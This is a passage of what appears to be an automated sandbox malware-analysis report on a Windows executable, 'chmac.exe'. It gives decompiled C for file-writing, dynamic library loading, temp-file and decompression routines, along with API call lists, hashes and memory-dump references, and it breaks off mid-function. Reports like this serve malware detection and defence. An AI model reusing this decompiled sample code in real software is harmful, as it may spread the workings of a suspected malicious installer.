						if(_t34 == 0) {
							goto L21;
						}
						L17:
						_t18 =  *0x41703c; // 0x4d9a0
						if(_t18 -  *0x40afa8 + _a4 > 0) {
							continue;
						}
						SetFilePointer( *0x409014, _t18, 0, 0); // executed
						goto L23;
					}
					_t21 = WriteFile( *0x409014, 0x40b038, _t40,  &_v4, 0); // executed
					if(_t21 == 0 || _t40 != _v4) {
						_push(0xfffffffe);
						L22:
						_pop(_t17);
						return _t17;
					} else {
						 *0x40afa8 =  *0x40afa8 + _t40;
						_t53 =  *0x40afcc; // 0x0
						if(_t53 != 0) {
							goto L6;
						}
						goto L17;
					}
					L21:
					_push(0xfffffffd);
					goto L22;
				}
				return _t14 | 0xffffffff;
			}

APIs

GetTickCount.KERNEL32 ref: 00403041

Part of subcall function 004031DA: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402E86,?), ref: 004031E8

SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,?,00402F37,00000004,00000000,00000000,00000000,?,?,?,00402EAD,000000FF,00000000), ref: 00403074
WriteFile.KERNELBASE(0040B038,004107E6,00000000,00000000,00413038,00004000,?,00000000,?,00402F37,00000004,00000000,00000000,00000000,?,?), ref: 0040312E
SetFilePointer.KERNELBASE(0004D9A0,00000000,00000000,00413038,00004000,?,00000000,?,00402F37,00000004,00000000,00000000,00000000,?,?), ref: 00403180

Strings

80A, xrefs: 004030A1

Memory Dump Source

Source File: 0000000F.00000002.342969714.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.342869266.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343107648.0000000000407000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343203428.0000000000409000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.343348948.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.343411245.0000000000429000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.343451233.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343464735.000000000042E000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343728294.000000000046E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_chmac.jbxd

Similarity

API ID: File$Pointer$CountTickWrite
String ID: 80A
API String ID: 2146148272-195308239
Opcode ID: 492b146ea58c14309b76aad4efb9c222274e911e7d047196bd2092e933975ded
Instruction ID: 8653c145dc750015188d6a9afa30315cb9c5a6a6900809742879fa1bd1138a56
Opcode Fuzzy Hash: 492b146ea58c14309b76aad4efb9c222274e911e7d047196bd2092e933975ded
Instruction Fuzzy Hash: 74417FB2504302AFD7109F19EE8496A3FBCF748396710813BE511B62F1C7386A559BAE

Uniqueness

Uniqueness Score: -1.00%

Function 00401F51, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 57%

			E00401F51(void* __ebx, void* __eflags) {
				struct HINSTANCE__* _t18;
				struct HINSTANCE__* _t25;
				void* _t26;
				struct HINSTANCE__* _t29;
				CHAR* _t31;
				intOrPtr* _t32;
				void* _t33;

				_t26 = __ebx;
				asm("sbb eax, 0x423f58");
				 *(_t33 - 4) = 1;
				if(__eflags < 0) {
					_push(0xffffffe7);
					L14:
					E00401423();
					L15:
					 *0x423f28 =  *0x423f28 +  *(_t33 - 4);
					return 0;
				}
				_t31 = E004029E8(0xfffffff0);
				 *(_t33 + 8) = E004029E8(1);
				if( *((intOrPtr*)(_t33 - 0x14)) == __ebx) {
					L3:
					_t18 = LoadLibraryExA(_t31, _t26, 8); // executed
					_t29 = _t18;
					if(_t29 == _t26) {
						_push(0xfffffff6);
						goto L14;
					}
					L4:
					_t32 = GetProcAddress(_t29,  *(_t33 + 8));
					if(_t32 == _t26) {
						E00404E23(0xfffffff7,  *(_t33 + 8));
					} else {
						 *(_t33 - 4) = _t26;
						if( *((intOrPtr*)(_t33 - 0x1c)) == _t26) {
							 *_t32( *((intOrPtr*)(_t33 - 0x34)), 0x400, 0x424000, 0x40af68, " ?B"); // executed
						} else {
							E00401423( *((intOrPtr*)(_t33 - 0x1c)));
							if( *_t32() != 0) {
								 *(_t33 - 4) = 1;
							}
						}
					}
					if( *((intOrPtr*)(_t33 - 0x18)) == _t26) {
						FreeLibrary(_t29);
					}
					goto L15;
				}
				_t25 = GetModuleHandleA(_t31); // executed
				_t29 = _t25;
				if(_t29 != __ebx) {
					goto L4;
				}
				goto L3;
			}

APIs

GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 00401F7C

Part of subcall function 00404E23: lstrlenA.KERNEL32(0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000,?), ref: 00404E5C
Part of subcall function 00404E23: lstrlenA.KERNEL32(00402C3C,0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000), ref: 00404E6C
Part of subcall function 00404E23: lstrcatA.KERNEL32(0041FC70,00402C3C,00402C3C,0041FC70,00000000,00000000,00000000), ref: 00404E7F
Part of subcall function 00404E23: SetWindowTextA.USER32(0041FC70,0041FC70), ref: 00404E91
Part of subcall function 00404E23: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404EB7
Part of subcall function 00404E23: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404ED1
Part of subcall function 00404E23: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404EDF

LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00401F8C
GetProcAddress.KERNEL32(00000000,?), ref: 00401F9C
FreeLibrary.KERNEL32(00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 00401FF9

Strings

?B, xrefs: 00401FC7

Memory Dump Source

Source File: 0000000F.00000002.342969714.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.342869266.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343107648.0000000000407000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343203428.0000000000409000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.343348948.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.343411245.0000000000429000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.343451233.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343464735.000000000042E000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343728294.000000000046E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_chmac.jbxd

Similarity

API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
String ID: ?B
API String ID: 2987980305-117478770
Opcode ID: 0013dd5c42a12ea961cdb4cd00b6dc1aa0902fbba5a2d5df2c5b14f7f9a972ce
Instruction ID: 6286e611532d8822c51d7e946ff34bbadf458e6cc54079b264412ac530ebcb8a
Opcode Fuzzy Hash: 0013dd5c42a12ea961cdb4cd00b6dc1aa0902fbba5a2d5df2c5b14f7f9a972ce
Instruction Fuzzy Hash: 9611E772D04216EBCF107FA4DE89EAE75B0AB44359F20423BF611B62E0C77C8941DA5E

Uniqueness

Uniqueness Score: -1.00%

Function 004015B3, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 85%

			E004015B3(struct _SECURITY_ATTRIBUTES* __ebx) {
				struct _SECURITY_ATTRIBUTES** _t10;
				int _t19;
				struct _SECURITY_ATTRIBUTES* _t20;
				signed char _t22;
				struct _SECURITY_ATTRIBUTES* _t23;
				CHAR* _t25;
				struct _SECURITY_ATTRIBUTES** _t29;
				void* _t30;

				_t23 = __ebx;
				_t25 = E004029E8(0xfffffff0);
				_t10 = E0040560C(_t25);
				_t27 = _t10;
				if(_t10 != __ebx) {
					do {
						_t29 = E004055A3(_t27, 0x5c);
						 *_t29 = _t23;
						 *((char*)(_t30 + 0xb)) =  *_t29;
						_t19 = CreateDirectoryA(_t25, _t23); // executed
						if(_t19 == 0) {
							if(GetLastError() != 0xb7) {
								L4:
								 *((intOrPtr*)(_t30 - 4)) =  *((intOrPtr*)(_t30 - 4)) + 1;
							} else {
								_t22 = GetFileAttributesA(_t25); // executed
								if((_t22 & 0x00000010) == 0) {
									goto L4;
								}
							}
						}
						_t20 =  *((intOrPtr*)(_t30 + 0xb));
						 *_t29 = _t20;
						_t27 =  &(_t29[0]);
					} while (_t20 != _t23);
				}
				if( *((intOrPtr*)(_t30 - 0x20)) == _t23) {
					_push(0xfffffff5);
					E00401423();
				} else {
					E00401423(0xffffffe6);
					E00405A85("C:\\Users\\hardz\\AppData\\Local\\Temp", _t25);
					SetCurrentDirectoryA(_t25); // executed
				}
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t30 - 4));
				return 0;
			}

APIs

Part of subcall function 0040560C: CharNextA.USER32(004053BE,?,004218A0,00000000,00405670,004218A0,004218A0,?,?,74E5F560,004053BE,?,"C:\Users\user\AppData\Roaming\dihsw\chmac.exe" ,74E5F560), ref: 0040561A
Part of subcall function 0040560C: CharNextA.USER32(00000000), ref: 0040561F
Part of subcall function 0040560C: CharNextA.USER32(00000000), ref: 0040562E

CreateDirectoryA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015DB
GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015E5
GetFileAttributesA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015F3
SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp,00000000,00000000,000000F0), ref: 00401622

Strings

C:\Users\user\AppData\Local\Temp, xrefs: 00401617

Memory Dump Source

Source File: 0000000F.00000002.342969714.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.342869266.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343107648.0000000000407000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343203428.0000000000409000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.343348948.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.343411245.0000000000429000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.343451233.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343464735.000000000042E000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343728294.000000000046E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_chmac.jbxd

Similarity

API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
String ID: C:\Users\user\AppData\Local\Temp
API String ID: 3751793516-501415292
Opcode ID: b22028777b76ff0adb18f2892ab6001a383c6b987e8d30e1b3724520259a3699
Instruction ID: 11ba4fe5436512bc7837d50811c3794abd92905400bb47a2e3f09ad75438aea6
Opcode Fuzzy Hash: b22028777b76ff0adb18f2892ab6001a383c6b987e8d30e1b3724520259a3699
Instruction Fuzzy Hash: B3010431908150AFDB116FB51D44D7F67B0AA56365768073BF491B22E2C63C4942D62E

Uniqueness

Uniqueness Score: -1.00%

Function 0040578B, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 32
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0040578B(char _a4, intOrPtr _a6, CHAR* _a8) {
				signed int _t11;
				int _t14;
				signed int _t16;
				void* _t19;
				CHAR* _t20;

				_t20 = _a4;
				_t19 = 0x64;
				while(1) {
					_t19 = _t19 - 1;
					_a4 = 0x61736e;
					_t11 = GetTickCount();
					_t16 = 0x1a;
					_a6 = _a6 + _t11 % _t16;
					_t14 = GetTempFileNameA(_a8,  &_a4, 0, _t20); // executed
					if(_t14 != 0) {
						break;
					}
					if(_t19 != 0) {
						continue;
					}
					 *_t20 =  *_t20 & 0x00000000;
					return _t14;
				}
				return _t20;
			}

APIs

GetTickCount.KERNEL32 ref: 0040579E
GetTempFileNameA.KERNELBASE(?,0061736E,00000000,?), ref: 004057B8

Strings

nsa, xrefs: 00405797
C:\Users\user\AppData\Local\Temp\, xrefs: 0040578B, 0040578E
"C:\Users\user\AppData\Roaming\dihsw\chmac.exe" , xrefs: 00405792

Memory Dump Source

Source File: 0000000F.00000002.342969714.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.342869266.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343107648.0000000000407000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343203428.0000000000409000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.343348948.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.343411245.0000000000429000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.343451233.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343464735.000000000042E000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343728294.000000000046E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_chmac.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: "C:\Users\user\AppData\Roaming\dihsw\chmac.exe" $C:\Users\user\AppData\Local\Temp\$nsa
API String ID: 1716503409-2820259346
Opcode ID: fc5e126f8815d4696b9f295c06fae67d9d4e63728d0dbdda5093f58b42bfadad
Instruction ID: 4fcdc00fff711095840056c8ed2a58f2bfde19b521d5dac465ae6a1bf3f6778c
Opcode Fuzzy Hash: fc5e126f8815d4696b9f295c06fae67d9d4e63728d0dbdda5093f58b42bfadad
Instruction Fuzzy Hash: F9F0A736348304B6D7104E55DC04B9B7F69DF91750F14C02BFA449B1C0D6B0995497A5

Uniqueness

Uniqueness Score: -1.00%

Function 004031F1, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 20
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 84%

			E004031F1(void* __eflags) {
				void* _t2;
				void* _t5;
				CHAR* _t6;

				_t6 = "C:\\Users\\hardz\\AppData\\Local\\Temp\\";
				E00405CE3(_t6);
				_t2 = E004055E5(_t6);
				if(_t2 != 0) {
					E00405578(_t6);
					CreateDirectoryA(_t6, 0); // executed
					_t5 = E0040578B("1033", _t6); // executed
					return _t5;
				} else {
					return _t2;
				}
			}

0x004031f2
0x004031f8
0x004031fe
0x00403205
0x0040320a
0x00403212
0x0040321e
0x00403224
0x00403208
0x00403208
0x00403208

APIs

Part of subcall function 00405CE3: CharNextA.USER32(?,*?|<>/":,00000000,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\AppData\Roaming\dihsw\chmac.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D3B
Part of subcall function 00405CE3: CharNextA.USER32(?,?,?,00000000), ref: 00405D48
Part of subcall function 00405CE3: CharNextA.USER32(?,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\AppData\Roaming\dihsw\chmac.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D4D
Part of subcall function 00405CE3: CharPrevA.USER32(?,?,"C:\Users\user\AppData\Roaming\dihsw\chmac.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D5D

CreateDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00403212

Strings

1033, xrefs: 00403219
C:\Users\user\AppData\Local\Temp\, xrefs: 004031F2, 004031F7, 004031FD, 00403209, 00403211, 00403218

Memory Dump Source

Source File: 0000000F.00000002.342969714.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.342869266.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343107648.0000000000407000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343203428.0000000000409000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.343348948.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.343411245.0000000000429000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.343451233.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343464735.000000000042E000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343728294.000000000046E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_chmac.jbxd

Similarity

API ID: Char$Next$CreateDirectoryPrev
String ID: 1033$C:\Users\user\AppData\Local\Temp\
API String ID: 4115351271-1075807775
Opcode ID: 048fde499a06d2c9d784819047d513c4ac368109c0a7a4f8390a920d62fbeaed
Instruction ID: 52f5018bb87fe832e559484150a565c10a299960058697363e648776ae6da385
Opcode Fuzzy Hash: 048fde499a06d2c9d784819047d513c4ac368109c0a7a4f8390a920d62fbeaed
Instruction Fuzzy Hash: 68D0C92164AD3036D551372A3D0AFDF090D9F4272EF21417BF804B50CA5B6C6A8319EF

Uniqueness

Uniqueness Score: -1.00%

Function 00406481, Relevance: 5.2, APIs: 4, Instructions: 236
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 99%

			E00406481() {
				signed int _t530;
				void _t537;
				signed int _t538;
				signed int _t539;
				unsigned short _t569;
				signed int _t579;
				signed int _t607;
				void* _t627;
				signed int _t628;
				signed int _t635;
				signed int* _t643;
				void* _t644;

				L0:
				while(1) {
					L0:
					_t530 =  *(_t644 - 0x30);
					if(_t530 >= 4) {
					}
					 *(_t644 - 0x40) = 6;
					 *(_t644 - 0x7c) = 0x19;
					 *((intOrPtr*)(_t644 - 0x58)) = (_t530 << 7) +  *(_t644 - 4) + 0x360;
					while(1) {
						L145:
						 *(_t644 - 0x50) = 1;
						 *(_t644 - 0x48) =  *(_t644 - 0x40);
						while(1) {
							L149:
							if( *(_t644 - 0x48) <= 0) {
								goto L155;
							}
							L150:
							_t627 =  *(_t644 - 0x50) +  *(_t644 - 0x50);
							_t643 = _t627 +  *((intOrPtr*)(_t644 - 0x58));
							 *(_t644 - 0x54) = _t643;
							_t569 =  *_t643;
							_t635 = _t569 & 0x0000ffff;
							_t607 = ( *(_t644 - 0x10) >> 0xb) * _t635;
							if( *(_t644 - 0xc) >= _t607) {
								 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t607;
								 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t607;
								_t628 = _t627 + 1;
								 *_t643 = _t569 - (_t569 >> 5);
								 *(_t644 - 0x50) = _t628;
							} else {
								 *(_t644 - 0x10) = _t607;
								 *(_t644 - 0x50) =  *(_t644 - 0x50) << 1;
								 *_t643 = (0x800 - _t635 >> 5) + _t569;
							}
							if( *(_t644 - 0x10) >= 0x1000000) {
								L148:
								_t487 = _t644 - 0x48;
								 *_t487 =  *(_t644 - 0x48) - 1;
								L149:
								if( *(_t644 - 0x48) <= 0) {
									goto L155;
								}
								goto L150;
							} else {
								L154:
								L146:
								if( *(_t644 - 0x6c) == 0) {
									L169:
									 *(_t644 - 0x88) = 0x18;
									L170:
									_t579 = 0x22;
									memcpy( *(_t644 - 0x90), _t644 - 0x88, _t579 << 2);
									_t539 = 0;
									L172:
									return _t539;
								}
								L147:
								 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
								 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
								_t484 = _t644 - 0x70;
								 *_t484 =  &(( *(_t644 - 0x70))[1]);
								 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
								goto L148;
							}
							L155:
							_t537 =  *(_t644 - 0x7c);
							 *((intOrPtr*)(_t644 - 0x44)) =  *(_t644 - 0x50) - (1 <<  *(_t644 - 0x40));
							while(1) {
								L140:
								 *(_t644 - 0x88) = _t537;
								while(1) {
									L1:
									_t538 =  *(_t644 - 0x88);
									if(_t538 > 0x1c) {
										break;
									}
									L2:
									switch( *((intOrPtr*)(_t538 * 4 +  &M004068EF))) {
										case 0:
											L3:
											if( *(_t644 - 0x6c) == 0) {
												goto L170;
											}
											L4:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t538 =  *( *(_t644 - 0x70));
											if(_t538 > 0xe1) {
												goto L171;
											}
											L5:
											_t542 = _t538 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t581);
											_push(9);
											_pop(_t582);
											_t638 = _t542 / _t581;
											_t544 = _t542 % _t581 & 0x000000ff;
											asm("cdq");
											_t633 = _t544 % _t582 & 0x000000ff;
											 *(_t644 - 0x3c) = _t633;
											 *(_t644 - 0x1c) = (1 << _t638) - 1;
											 *((intOrPtr*)(_t644 - 0x18)) = (1 << _t544 / _t582) - 1;
											_t641 = (0x300 << _t633 + _t638) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t644 - 0x78))) {
												L10:
												if(_t641 == 0) {
													L12:
													 *(_t644 - 0x48) =  *(_t644 - 0x48) & 0x00000000;
													 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t641 = _t641 - 1;
													 *((short*)( *(_t644 - 4) + _t641 * 2)) = 0x400;
												} while (_t641 != 0);
												goto L12;
											}
											L6:
											if( *(_t644 - 4) != 0) {
												GlobalFree( *(_t644 - 4));
											}
											_t538 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t644 - 4) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t644 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L157:
												 *(_t644 - 0x88) = 1;
												goto L170;
											}
											L14:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x40) =  *(_t644 - 0x40) | ( *( *(_t644 - 0x70)) & 0x000000ff) <<  *(_t644 - 0x48) << 0x00000003;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t45 = _t644 - 0x48;
											 *_t45 =  *(_t644 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t644 - 0x48) < 4) {
												goto L13;
											}
											L16:
											_t550 =  *(_t644 - 0x40);
											if(_t550 ==  *(_t644 - 0x74)) {
												L20:
												 *(_t644 - 0x48) = 5;
												 *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) =  *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											L17:
											 *(_t644 - 0x74) = _t550;
											if( *(_t644 - 8) != 0) {
												GlobalFree( *(_t644 - 8));
											}
											_t538 = GlobalAlloc(0x40,  *(_t644 - 0x40)); // executed
											 *(_t644 - 8) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t557 =  *(_t644 - 0x60) &  *(_t644 - 0x1c);
											 *(_t644 - 0x84) = 6;
											 *(_t644 - 0x4c) = _t557;
											_t642 =  *(_t644 - 4) + (( *(_t644 - 0x38) << 4) + _t557) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L158:
												 *(_t644 - 0x88) = 3;
												goto L170;
											}
											L22:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											_t67 = _t644 - 0x70;
											 *_t67 =  &(( *(_t644 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L23:
											 *(_t644 - 0x48) =  *(_t644 - 0x48) - 1;
											if( *(_t644 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t559 =  *_t642;
											_t626 = _t559 & 0x0000ffff;
											_t596 = ( *(_t644 - 0x10) >> 0xb) * _t626;
											if( *(_t644 - 0xc) >= _t596) {
												 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t596;
												 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t596;
												 *(_t644 - 0x40) = 1;
												_t560 = _t559 - (_t559 >> 5);
												__eflags = _t560;
												 *_t642 = _t560;
											} else {
												 *(_t644 - 0x10) = _t596;
												 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
												 *_t642 = (0x800 - _t626 >> 5) + _t559;
											}
											if( *(_t644 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t644 - 0x6c) == 0) {
												L168:
												 *(_t644 - 0x88) = 5;
												goto L170;
											}
											L138:
											 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L139:
											_t537 =  *(_t644 - 0x84);
											L140:
											 *(_t644 - 0x88) = _t537;
											goto L1;
										case 6:
											L25:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L36:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L26:
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												L35:
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												L32:
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											L66:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												L68:
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
